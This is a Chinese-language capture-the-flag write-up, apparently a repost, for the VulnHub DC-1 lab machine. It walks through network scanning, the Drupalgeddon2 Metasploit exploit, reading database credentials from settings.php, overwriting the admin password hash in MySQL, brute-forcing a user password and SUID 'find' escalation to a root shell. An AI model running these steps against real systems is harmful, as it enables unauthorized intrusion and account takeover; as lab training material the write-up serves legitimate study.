码迷,mamicode.com
首页 > 其他好文 > 详细

DC-1靶机

时间:2020-05-07 19:39:58      阅读:166      评论:0      收藏:0      [点我收藏+]

标签:acp   scripts   irb   alc   获得   bsp   bash   src   arc   

仅供个人娱乐

靶机信息

下载地址:https://download.vulnhub.com/dc/DC-1.zip

一、主机扫描

arp-scan  -l

nmap -p 1-65535 -A -sV 192.168.216.135

技术图片

二、信息收集

技术图片

dirb  http://192.168.216.135

技术图片
技术图片

使用版本漏洞攻击

search drupal

技术图片

msf5 > use 4

msf5exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.216.135

rhosts => 192.168.216.135

msf5exploit(unix/webapp/drupal_drupalgeddon2) > run

技术图片
技术图片

得到shell

python -c ‘import pty;pty.spawn("/bin/bash");‘

技术图片

信息收集

技术图片
技术图片

www-data@DC-1:/var/www$ cd sites/default

cd sites/default

技术图片

www-data@DC-1:/var/www/sites/default$ catsettings.php

ps aux | grep mysql

技术图片

进入数据库

技术图片

数据库信息收集

技术图片
技术图片

密码都做了hash加密,解密不了

重置密码http://drupalchina.cn/node/1964

直接进入drupal的安装目录,然后运行命令

php ./scripts/password-hash.sh 12345

技术图片

登录mysql修改密码

UPDATE users SET pass = ‘$S$DZyKe31ZRwS4msLQYHacPaiIpOZIwHsblIeObnCuz4o3OeGDMblJ‘ where uid = 1;

技术图片

登录账户

信息收集

技术图片
技术图片

爆破flag4后获得密码orange

flag4@DC-1:~$ touch getflag

flag4@DC-1:~$ find / -type f -name getflag-exec "whoami" \;

root

flag4@DC-1:~$ find / -type f -name getflag-exec "/bin/bash" \;

技术图片

DC-1靶机

标签:acp   scripts   irb   alc   获得   bsp   bash   src   arc   

原文地址:https://www.cnblogs.com/bingtang123/p/12838388.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!